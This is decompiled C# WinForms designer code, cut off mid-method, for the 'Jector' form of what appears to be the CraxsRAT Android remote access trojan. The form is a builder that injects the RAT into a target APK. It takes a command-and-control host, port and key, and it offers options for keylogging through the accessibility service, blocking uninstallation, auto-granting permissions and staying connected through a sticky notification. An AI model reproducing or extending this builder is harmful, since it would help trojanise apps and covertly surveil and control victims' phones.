namespace Craxs_Rat
{
	// Token: 0x020000B9 RID: 185
	[global::Microsoft.VisualBasic.CompilerServices.DesignerGenerated]
	public partial class Jector : global::System.Windows.Forms.Form
	{
		// Token: 0x06000D3F RID: 3391 RVA: 0x0008BCA8 File Offset: 0x00089EA8
		protected override void Dispose(bool disposing)
		{
			try
			{
				if (disposing && this.components != null)
				{
					((global::System.IDisposable)this.components).Dispose();
				}
			}
			finally
			{
				base.Dispose(disposing);
			}
		}

		// Token: 0x06000D40 RID: 3392 RVA: 0x0008BCEC File Offset: 0x00089EEC
		private void InitializeComponent()
		{
			this.components = new global::System.ComponentModel.Container();
			global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::Craxs_Rat.Jector));
			this.Label1 = new global::System.Windows.Forms.Label();
			this.Label2 = new global::System.Windows.Forms.Label();
			this.Label3 = new global::System.Windows.Forms.Label();
			this.FolderPath = new global::System.Windows.Forms.TextBox();
			this.Button1 = new global::System.Windows.Forms.Button();
			this.addactiv = new global::System.Windows.Forms.Button();
			this.Label5 = new global::System.Windows.Forms.Label();
			this.log = new global::System.Windows.Forms.TextBox();
			this.Button3 = new global::System.Windows.Forms.Button();
			this.Label4 = new global::System.Windows.Forms.Label();
			this.checksuper = new global::System.Windows.Forms.CheckBox();
			this.Label7 = new global::System.Windows.Forms.Label();
			this.Panel1 = new global::System.Windows.Forms.Panel();
			this.Host = new global::DrakeUI.Framework.DrakeUITextBox();
			this.TheKey = new global::DrakeUI.Framework.DrakeUITextBox();
			this.Port = new global::DrakeUI.Framework.DrakeUITextBox();
			this.CLiname = new global::DrakeUI.Framework.DrakeUITextBox();
			this.Panel2 = new global::System.Windows.Forms.Panel();
			this.ToolTip1 = new global::System.Windows.Forms.ToolTip(this.components);
			this.checkkill = new global::System.Windows.Forms.CheckBox();
			this.DrakeUIAvatar2 = new global::DrakeUI.Framework.DrakeUIAvatar();
			this.DrakeUIAvatar5 = new global::DrakeUI.Framework.DrakeUIAvatar();
			this.checkDraw = new global::System.Windows.Forms.CheckBox();
			this.checkautoclick = new global::System.Windows.Forms.CheckBox();
			this.DrakeUIAvatar6 = new global::DrakeUI.Framework.DrakeUIAvatar();
			this.PictureBox1 = new global::System.Windows.Forms.PictureBox();
			this.maintapcontrols = new global::DrakeUI.Framework.DrakeUITabControlMenu();
			this.TabPage1 = new global::System.Windows.Forms.TabPage();
			this.list_activ = new global::System.Windows.Forms.TabPage();
			this.removeactiv = new global::System.Windows.Forms.Button();
			this.Activlist = new global::DrakeUI.Framework.DrakeUIListBox();
			this.TabPage3 = new global::System.Windows.Forms.TabPage();
			this.Label14 = new global::System.Windows.Forms.Label();
			this.ComboPrims = new global::System.Windows.Forms.ComboBox();
			this.Label12 = new global::System.Windows.Forms.Label();
			this.Label11 = new global::System.Windows.Forms.Label();
			this.msgtext = new global::DrakeUI.Framework.DrakeUITextBox();
			this.Label10 = new global::System.Windows.Forms.Label();
			this.titletext = new global::DrakeUI.Framework.DrakeUITextBox();
			this.TabPage4 = new global::System.Windows.Forms.TabPage();
			this.TabPage5 = new global::System.Windows.Forms.TabPage();
			this.Label6 = new global::System.Windows.Forms.Label();
			this.PictureBox2 = new global::System.Windows.Forms.PictureBox();
			this.DrakeUIAvatar4 = new global::DrakeUI.Framework.DrakeUIAvatar();
			this.DrakeUITitlePanel2 = new global::DrakeUI.Framework.DrakeUITitlePanel();
			this.Panel3 = new global::System.Windows.Forms.Panel();
			this.Label13 = new global::System.Windows.Forms.Label();
			this.Comboinject = new global::System.Windows.Forms.ComboBox();
			this.Label9 = new global::System.Windows.Forms.Label();
			this.Panel1.SuspendLayout();
			this.Panel2.SuspendLayout();
			((global::System.ComponentModel.ISupportInitialize)this.PictureBox1).BeginInit();
			this.maintapcontrols.SuspendLayout();
			this.TabPage1.SuspendLayout();
			this.list_activ.SuspendLayout();
			this.TabPage3.SuspendLayout();
			this.TabPage4.SuspendLayout();
			this.TabPage5.SuspendLayout();
			((global::System.ComponentModel.ISupportInitialize)this.PictureBox2).BeginInit();
			this.DrakeUITitlePanel2.SuspendLayout();
			this.Panel3.SuspendLayout();
			base.SuspendLayout();
			this.Label1.AutoSize = true;
			this.Label1.Font = new global::System.Drawing.Font("Roboto Condensed", 14f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label1.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label1.Location = new global::System.Drawing.Point(82, 215);
			this.Label1.Name = "Label1";
			this.Label1.Size = new global::System.Drawing.Size(108, 29);
			this.Label1.TabIndex = 1;
			this.Label1.Text = "Host or IP";
			this.Label2.AutoSize = true;
			this.Label2.Font = new global::System.Drawing.Font("Roboto Condensed", 14f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label2.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label2.Location = new global::System.Drawing.Point(405, 215);
			this.Label2.Name = "Label2";
			this.Label2.Size = new global::System.Drawing.Size(53, 29);
			this.Label2.TabIndex = 2;
			this.Label2.Text = "Port";
			this.Label3.AutoSize = true;
			this.Label3.Font = new global::System.Drawing.Font("Roboto Condensed", 14f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label3.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label3.Location = new global::System.Drawing.Point(411, 107);
			this.Label3.Name = "Label3";
			this.Label3.Size = new global::System.Drawing.Size(47, 29);
			this.Label3.TabIndex = 4;
			this.Label3.Text = "Key";
			this.FolderPath.BackColor = global::System.Drawing.Color.FromArgb(23, 23, 23);
			this.FolderPath.ForeColor = global::System.Drawing.Color.White;
			this.FolderPath.Location = new global::System.Drawing.Point(8, 50);
			this.FolderPath.Name = "FolderPath";
			this.FolderPath.ReadOnly = true;
			this.FolderPath.Size = new global::System.Drawing.Size(501, 30);
			this.FolderPath.TabIndex = 7;
			this.Button1.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.Button1.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Button1.Location = new global::System.Drawing.Point(117, 82);
			this.Button1.Name = "Button1";
			this.Button1.Size = new global::System.Drawing.Size(290, 41);
			this.Button1.TabIndex = 8;
			this.Button1.Text = "Select";
			this.Button1.UseVisualStyleBackColor = true;
			this.addactiv.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.addactiv.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.addactiv.Location = new global::System.Drawing.Point(44, 244);
			this.addactiv.Name = "addactiv";
			this.addactiv.Size = new global::System.Drawing.Size(529, 47);
			this.addactiv.TabIndex = 11;
			this.addactiv.Text = "Add";
			this.addactiv.UseVisualStyleBackColor = true;
			this.Label5.AutoSize = true;
			this.Label5.Font = new global::System.Drawing.Font("Roboto", 13f);
			this.Label5.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label5.Location = new global::System.Drawing.Point(232, 214);
			this.Label5.Name = "Label5";
			this.Label5.Size = new global::System.Drawing.Size(161, 27);
			this.Label5.TabIndex = 9;
			this.Label5.Text = "Target Activitys";
			this.log.BackColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.log.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.log.Font = new global::System.Drawing.Font("Roboto", 10f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.log.ForeColor = global::System.Drawing.Color.Lime;
			this.log.Location = new global::System.Drawing.Point(0, 61);
			this.log.Multiline = true;
			this.log.Name = "log";
			this.log.ReadOnly = true;
			this.log.Size = new global::System.Drawing.Size(691, 533);
			this.log.TabIndex = 12;
			this.log.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.Button3.BackColor = global::System.Drawing.Color.Black;
			this.Button3.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.Button3.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.Button3.Font = new global::System.Drawing.Font("Roboto", 15f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Button3.ForeColor = global::System.Drawing.Color.Lime;
			this.Button3.Location = new global::System.Drawing.Point(0, 0);
			this.Button3.Name = "Button3";
			this.Button3.Size = new global::System.Drawing.Size(691, 61);
			this.Button3.TabIndex = 13;
			this.Button3.Text = "Start ";
			this.Button3.UseVisualStyleBackColor = false;
			this.Label4.AutoSize = true;
			this.Label4.Font = new global::System.Drawing.Font("Roboto", 13f);
			this.Label4.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label4.Location = new global::System.Drawing.Point(187, 12);
			this.Label4.Name = "Label4";
			this.Label4.Size = new global::System.Drawing.Size(182, 27);
			this.Label4.TabIndex = 6;
			this.Label4.Text = "Target Apk Foder ";
			this.checksuper.AutoSize = true;
			this.checksuper.Font = new global::System.Drawing.Font("Roboto", 12f, global::System.Drawing.FontStyle.Bold);
			this.checksuper.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.checksuper.Location = new global::System.Drawing.Point(24, 51);
			this.checksuper.Name = "checksuper";
			this.checksuper.RightToLeft = global::System.Windows.Forms.RightToLeft.Yes;
			this.checksuper.Size = new global::System.Drawing.Size(223, 28);
			this.checksuper.TabIndex = 16;
			this.checksuper.Text = "Request Accessibility";
			this.ToolTip1.SetToolTip(this.checksuper, "1: Required for Keylogger and anti delete\r\n\r\n2: Don't Enable if injected app Already Request it");
			this.checksuper.UseVisualStyleBackColor = true;
			this.Label7.AutoSize = true;
			this.Label7.Font = new global::System.Drawing.Font("Roboto Condensed", 14f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label7.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label7.Location = new global::System.Drawing.Point(82, 107);
			this.Label7.Name = "Label7";
			this.Label7.Size = new global::System.Drawing.Size(131, 29);
			this.Label7.TabIndex = 18;
			this.Label7.Text = "Client Name";
			this.Panel1.Controls.Add(this.Label2);
			this.Panel1.Controls.Add(this.Label3);
			this.Panel1.Controls.Add(this.Label7);
			this.Panel1.Controls.Add(this.Label1);
			this.Panel1.Controls.Add(this.Host);
			this.Panel1.Controls.Add(this.TheKey);
			this.Panel1.Controls.Add(this.Port);
			this.Panel1.Controls.Add(this.CLiname);
			this.Panel1.Location = new global::System.Drawing.Point(27, 159);
			this.Panel1.Name = "Panel1";
			this.Panel1.Size = new global::System.Drawing.Size(574, 334);
			this.Panel1.TabIndex = 19;
			this.Host.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.Host.FillColor = global::System.Drawing.Color.Black;
			this.Host.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.Host.ForeColor = global::System.Drawing.Color.White;
			this.Host.Location = new global::System.Drawing.Point(22, 249);
			this.Host.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.Host.Maximum = 2147483647.0;
			this.Host.Minimum = -2147483648.0;
			this.Host.Name = "Host";
			this.Host.Padding = new global::System.Windows.Forms.Padding(5);
			this.Host.Radius = 15;
			this.Host.RectColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Host.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.Host.Size = new global::System.Drawing.Size(228, 30);
			this.Host.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.Host.StyleCustomMode = true;
			this.Host.TabIndex = 22;
			this.Host.TextAlignment = global::System.Drawing.ContentAlignment.TopCenter;
			this.TheKey.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.TheKey.FillColor = global::System.Drawing.Color.Black;
			this.TheKey.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.TheKey.ForeColor = global::System.Drawing.Color.White;
			this.TheKey.Location = new global::System.Drawing.Point(314, 141);
			this.TheKey.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.TheKey.Maximum = 2147483647.0;
			this.TheKey.Minimum = -2147483648.0;
			this.TheKey.Name = "TheKey";
			this.TheKey.Padding = new global::System.Windows.Forms.Padding(5);
			this.TheKey.Radius = 15;
			this.TheKey.RectColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.TheKey.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.TheKey.Size = new global::System.Drawing.Size(228, 30);
			this.TheKey.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.TheKey.StyleCustomMode = true;
			this.TheKey.TabIndex = 21;
			this.TheKey.TextAlignment = global::System.Drawing.ContentAlignment.TopCenter;
			this.Port.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.Port.FillColor = global::System.Drawing.Color.Black;
			this.Port.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.Port.ForeColor = global::System.Drawing.Color.White;
			this.Port.Location = new global::System.Drawing.Point(314, 249);
			this.Port.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.Port.Maximum = 2147483647.0;
			this.Port.Minimum = -2147483648.0;
			this.Port.Name = "Port";
			this.Port.Padding = new global::System.Windows.Forms.Padding(5);
			this.Port.Radius = 15;
			this.Port.RectColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Port.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.Port.Size = new global::System.Drawing.Size(228, 30);
			this.Port.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.Port.StyleCustomMode = true;
			this.Port.TabIndex = 20;
			this.Port.TextAlignment = global::System.Drawing.ContentAlignment.TopCenter;
			this.CLiname.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.CLiname.FillColor = global::System.Drawing.Color.Black;
			this.CLiname.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.CLiname.ForeColor = global::System.Drawing.Color.White;
			this.CLiname.Location = new global::System.Drawing.Point(22, 141);
			this.CLiname.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.CLiname.Maximum = 2147483647.0;
			this.CLiname.Minimum = -2147483648.0;
			this.CLiname.Name = "CLiname";
			this.CLiname.Padding = new global::System.Windows.Forms.Padding(5);
			this.CLiname.Radius = 15;
			this.CLiname.RectColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.CLiname.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.CLiname.Size = new global::System.Drawing.Size(228, 30);
			this.CLiname.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.CLiname.StyleCustomMode = true;
			this.CLiname.TabIndex = 19;
			this.CLiname.TextAlignment = global::System.Drawing.ContentAlignment.TopCenter;
			this.Panel2.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.Panel2.Controls.Add(this.Label4);
			this.Panel2.Controls.Add(this.FolderPath);
			this.Panel2.Controls.Add(this.Button1);
			this.Panel2.Location = new global::System.Drawing.Point(44, 51);
			this.Panel2.Name = "Panel2";
			this.Panel2.Size = new global::System.Drawing.Size(529, 128);
			this.Panel2.TabIndex = 20;
			this.ToolTip1.BackColor = global::System.Drawing.Color.Black;
			this.ToolTip1.ForeColor = global::System.Drawing.Color.White;
			this.checkkill.AutoSize = true;
			this.checkkill.Font = new global::System.Drawing.Font("Roboto", 12f, global::System.Drawing.FontStyle.Bold);
			this.checkkill.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.checkkill.Location = new global::System.Drawing.Point(413, 51);
			this.checkkill.Name = "checkkill";
			this.checkkill.RightToLeft = global::System.Windows.Forms.RightToLeft.Yes;
			this.checkkill.Size = new global::System.Drawing.Size(162, 28);
			this.checkkill.TabIndex = 28;
			this.checkkill.Text = "Anti - uninstall";
			this.ToolTip1.SetToolTip(this.checkkill, "Prevent Client Form Deleting the app");
			this.checkkill.UseVisualStyleBackColor = true;
			this.DrakeUIAvatar2.AvatarSize = 25;
			this.DrakeUIAvatar2.BackColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIAvatar2.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIAvatar2.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIAvatar2.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.DrakeUIAvatar2.Location = new global::System.Drawing.Point(495, 217);
			this.DrakeUIAvatar2.Name = "DrakeUIAvatar2";
			this.DrakeUIAvatar2.Size = new global::System.Drawing.Size(36, 28);
			this.DrakeUIAvatar2.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIAvatar2.Symbol = 61529;
			this.DrakeUIAvatar2.SymbolSize = 25;
			this.DrakeUIAvatar2.TabIndex = 29;
			this.DrakeUIAvatar2.Text = "DrakeUIAvatar2";
			this.ToolTip1.SetToolTip(this.DrakeUIAvatar2, "if you get error while compiling the apk\r\ntry change injection method.");
			this.DrakeUIAvatar5.AvatarSize = 25;
			this.DrakeUIAvatar5.BackColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIAvatar5.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIAvatar5.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIAvatar5.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.DrakeUIAvatar5.Location = new global::System.Drawing.Point(266, 433);
			this.DrakeUIAvatar5.Name = "DrakeUIAvatar5";
			this.DrakeUIAvatar5.Size = new global::System.Drawing.Size(36, 28);
			this.DrakeUIAvatar5.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIAvatar5.Symbol = 61529;
			this.DrakeUIAvatar5.SymbolSize = 25;
			this.DrakeUIAvatar5.TabIndex = 36;
			this.DrakeUIAvatar5.Text = "DrakeUIAvatar5";
			this.ToolTip1.SetToolTip(this.DrakeUIAvatar5, "To Keep the App Connected After App close\r\nWe need to Show Sticky Notification");
			this.checkDraw.AutoSize = true;
			this.checkDraw.Font = new global::System.Drawing.Font("Roboto", 12f, global::System.Drawing.FontStyle.Bold);
			this.checkDraw.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.checkDraw.Location = new global::System.Drawing.Point(400, 94);
			this.checkDraw.Name = "checkDraw";
			this.checkDraw.RightToLeft = global::System.Windows.Forms.RightToLeft.Yes;
			this.checkDraw.Size = new global::System.Drawing.Size(175, 28);
			this.checkDraw.TabIndex = 39;
			this.checkDraw.Text = "Draw Over Apps";
			this.ToolTip1.SetToolTip(this.checkDraw, "Prevent Client Form Deleting the app");
			this.checkDraw.UseVisualStyleBackColor = true;
			this.checkautoclick.AutoSize = true;
			this.checkautoclick.Font = new global::System.Drawing.Font("Roboto", 12f, global::System.Drawing.FontStyle.Bold);
			this.checkautoclick.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.checkautoclick.Location = new global::System.Drawing.Point(58, 94);
			this.checkautoclick.Name = "checkautoclick";
			this.checkautoclick.RightToLeft = global::System.Windows.Forms.RightToLeft.Yes;
			this.checkautoclick.Size = new global::System.Drawing.Size(189, 28);
			this.checkautoclick.TabIndex = 40;
			this.checkautoclick.Text = "Auto Permissions";
			this.ToolTip1.SetToolTip(this.checkautoclick, "Prevent Client Form Deleting the app");
			this.checkautoclick.UseVisualStyleBackColor = true;
			this.DrakeUIAvatar6.AvatarSize = 25;
			this.DrakeUIAvatar6.BackColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIAvatar6.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIAvatar6.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIAvatar6.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.DrakeUIAvatar6.Location = new global::System.Drawing.Point(253, 94);
			this.DrakeUIAvatar6.Name = "DrakeUIAvatar6";
			this.DrakeUIAvatar6.Size = new global::System.Drawing.Size(36, 28);
			this.DrakeUIAvatar6.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIAvatar6.Symbol = 61529;
			this.DrakeUIAvatar6.SymbolSize = 25;
			this.DrakeUIAvatar6.TabIndex = 41;
			this.DrakeUIAvatar6.Text = "DrakeUIAvatar6";
			this.ToolTip1.SetToolTip(this.DrakeUIAvatar6, "Auto Click Allow for Permission\r\n(Accessibility Required)");
			this.PictureBox1.Image = global::Craxs_Rat.Module0.LOGO;
			this.PictureBox1.Location = new global::System.Drawing.Point(219, 81);
			this.PictureBox1.Name = "PictureBox1";
			this.PictureBox1.Size = new global::System.Drawing.Size(169, 112);
			this.PictureBox1.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
			this.PictureBox1.TabIndex = 23;
			this.PictureBox1.TabStop = false;
			this.maintapcontrols.Alignment = global::System.Windows.Forms.TabAlignment.Left;
			this.maintapcontrols.Controls.Add(this.TabPage1);
			this.maintapcontrols.Controls.Add(this.list_activ);
			this.maintapcontrols.Controls.Add(this.TabPage3);
			this.maintapcontrols.Controls.Add(this.TabPage4);
			this.maintapcontrols.Controls.Add(this.TabPage5);
			this.maintapcontrols.Dock = global::System.Windows.Forms.DockStyle.Fill;
			this.maintapcontrols.DrawMode = global::System.Windows.Forms.TabDrawMode.OwnerDrawFixed;
			this.maintapcontrols.FillColor = global::System.Drawing.Color.Black;
			this.maintapcontrols.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.maintapcontrols.ItemSize = new global::System.Drawing.Size(87, 125);
			this.maintapcontrols.Location = new global::System.Drawing.Point(0, 35);
			this.maintapcontrols.MenuStyle = global::DrakeUI.Framework.UIMenuStyle.Custom;
			this.maintapcontrols.Multiline = true;
			this.maintapcontrols.Name = "maintapcontrols";
			this.maintapcontrols.SelectedIndex = 0;
			this.maintapcontrols.Size = new global::System.Drawing.Size(817, 594);
			this.maintapcontrols.SizeMode = global::System.Windows.Forms.TabSizeMode.Fixed;
			this.maintapcontrols.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.maintapcontrols.StyleCustomMode = true;
			this.maintapcontrols.TabBackColor = global::System.Drawing.Color.Black;
			this.maintapcontrols.TabIndex = 29;
			this.maintapcontrols.TabSelectedColor = global::System.Drawing.Color.FromArgb(21, 21, 21);
			this.maintapcontrols.TabSelectedForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.maintapcontrols.TabSelectedHighColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.maintapcontrols.TabUnSelectedForeColor = global::System.Drawing.Color.White;
			this.maintapcontrols.TextAlignment = global::System.Windows.Forms.HorizontalAlignment.Left;
			this.TabPage1.BackColor = global::System.Drawing.Color.Black;
			this.TabPage1.Controls.Add(this.PictureBox1);
			this.TabPage1.Controls.Add(this.Panel1);
			this.TabPage1.Location = new global::System.Drawing.Point(126, 0);
			this.TabPage1.Name = "TabPage1";
			this.TabPage1.Size = new global::System.Drawing.Size(691, 594);
			this.TabPage1.TabIndex = 0;
			this.TabPage1.Text = "Connection";
			this.list_activ.BackColor = global::System.Drawing.Color.Black;
			this.list_activ.Controls.Add(this.removeactiv);
			this.list_activ.Controls.Add(this.Activlist);
			this.list_activ.Controls.Add(this.Panel2);
			this.list_activ.Controls.Add(this.addactiv);
			this.list_activ.Controls.Add(this.Label5);
			this.list_activ.Location = new global::System.Drawing.Point(126, 0);
			this.list_activ.Name = "list_activ";
			this.list_activ.Size = new global::System.Drawing.Size(691, 594);
			this.list_activ.TabIndex = 1;
			this.list_activ.Text = "Target";
			this.removeactiv.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.removeactiv.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.removeactiv.Location = new global::System.Drawing.Point(44, 465);
			this.removeactiv.Name = "removeactiv";
			this.removeactiv.Size = new global::System.Drawing.Size(529, 39);
			this.removeactiv.TabIndex = 22;
			this.removeactiv.Text = "Remove";
			this.removeactiv.UseVisualStyleBackColor = true;
			this.Activlist.BackColor = global::System.Drawing.Color.FromArgb(20, 31, 20);
			this.Activlist.FillColor = global::System.Drawing.Color.FromArgb(20, 31, 20);
			this.Activlist.FillDisableColor = global::System.Drawing.Color.FromArgb(20, 31, 20);
			this.Activlist.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.Activlist.ForeColor = global::System.Drawing.Color.Black;
			this.Activlist.HoverColor = global::System.Drawing.Color.Silver;
			this.Activlist.ItemSelectBackColor = global::System.Drawing.Color.FromArgb(140, 140, 140);
			this.Activlist.ItemSelectForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Activlist.Location = new global::System.Drawing.Point(44, 299);
			this.Activlist.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.Activlist.Name = "Activlist";
			this.Activlist.Padding = new global::System.Windows.Forms.Padding(7);
			this.Activlist.Radius = 15;
			this.Activlist.RectColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Activlist.RectDisableColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Activlist.Size = new global::System.Drawing.Size(529, 158);
			this.Activlist.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.Activlist.StyleCustomMode = true;
			this.Activlist.TabIndex = 21;
			this.Activlist.Text = "DrakeUIListBox1";
			this.TabPage3.BackColor = global::System.Drawing.Color.Black;
			this.TabPage3.Controls.Add(this.DrakeUIAvatar6);
			this.TabPage3.Controls.Add(this.checkautoclick);
			this.TabPage3.Controls.Add(this.checkDraw);
			this.TabPage3.Controls.Add(this.Label14);
			this.TabPage3.Controls.Add(this.ComboPrims);
			this.TabPage3.Controls.Add(this.DrakeUIAvatar5);
			this.TabPage3.Controls.Add(this.Label12);
			this.TabPage3.Controls.Add(this.Label11);
			this.TabPage3.Controls.Add(this.msgtext);
			this.TabPage3.Controls.Add(this.Label10);
			this.TabPage3.Controls.Add(this.titletext);
			this.TabPage3.Controls.Add(this.DrakeUIAvatar2);
			this.TabPage3.Controls.Add(this.checksuper);
			this.TabPage3.Controls.Add(this.checkkill);
			this.TabPage3.Controls.Add(this.Comboinject);
			this.TabPage3.Controls.Add(this.Label9);
			this.TabPage3.Location = new global::System.Drawing.Point(126, 0);
			this.TabPage3.Name = "TabPage3";
			this.TabPage3.Size = new global::System.Drawing.Size(691, 594);
			this.TabPage3.TabIndex = 2;
			this.TabPage3.Text = "Options";
			this.Label14.AutoSize = true;
			this.Label14.Font = new global::System.Drawing.Font("Roboto", 13f);
			this.Label14.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label14.Location = new global::System.Drawing.Point(154, 277);
			this.Label14.Name = "Label14";
			this.Label14.Size = new global::System.Drawing.Size(142, 27);
			this.Label14.TabIndex = 38;
			this.Label14.Text = "Permissions :";
			this.ComboPrims.BackColor = global::System.Drawing.Color.Black;
			this.ComboPrims.DropDownStyle = global::System.Windows.Forms.ComboBoxStyle.DropDownList;
			this.ComboPrims.FlatStyle = global::System.Windows.Forms.FlatStyle.Popup;
			this.ComboPrims.ForeColor = global::System.Drawing.Color.White;
			this.ComboPrims.FormattingEnabled = true;
			this.ComboPrims.Items.AddRange(new object[]
			{
				"ALL Permissions ",
				"Only Needed"
			});
			this.ComboPrims.Location = new global::System.Drawing.Point(323, 275);
			this.ComboPrims.Name = "ComboPrims";
			this.ComboPrims.Size = new global::System.Drawing.Size(163, 33);
			this.ComboPrims.TabIndex = 37;
			this.Label12.AutoSize = true;
			this.Label12.Font = new global::System.Drawing.Font("Roboto Condensed", 14f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label12.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label12.Location = new global::System.Drawing.Point(44, 433);
			this.Label12.Name = "Label12";
			this.Label12.Size = new global::System.Drawing.Size(216, 29);
			this.Label12.TabIndex = 35;
			this.Label12.Text = "Custome Notification";
			this.Label11.AutoSize = true;
			this.Label11.Font = new global::System.Drawing.Font("Roboto Condensed", 14f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.Label11.ForeColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.Label11.Location = new global::System.Drawing.Point(354, 440);
			this.Label11.Name = "Label11";
			this.Label11.Size = new global::System.Drawing.Size(217, 29);
			this.Label11.TabIndex = 33;
			this.Label11.Text = "Notification Message";
			this.msgtext.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.msgtext.FillColor = global::System.Drawing.Color.Black;
			this.msgtext.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.msgtext.ForeColor = global::System.Drawing.Color.White;
			this.msgtext.Location = new global::System.Drawing.Point(323, 474);
			this.msgtext.Margin = new global::System.Windows.Forms.Padding(4, 5, 4, 5);
			this.msgtext.Maximum = 2147483647.0;
			this.msgtext.Minimum = -2147483648.0;
			this.msgtext.Name = "msgtext";
			this.msgtext.Padding = new global::System.Windows.Forms.Padding(5);
			this.msgtext.Radius = 15;
			this.msgtext.RectColor = global::System.Drawing.Color.FromArgb(195, 18, 9);
			this.msgtext.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.msgtext.Size = new global::System.Drawing.Size(248, 30);
			this.msgtext.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.msgtext.StyleCustomMode = true;
			this.msgtext.TabIndex = 34;
			this.msgtext.TextAlignment = global::System.Drawing.ContentAlignment.TopCenter;
			this.Label10.AutoSize = true;
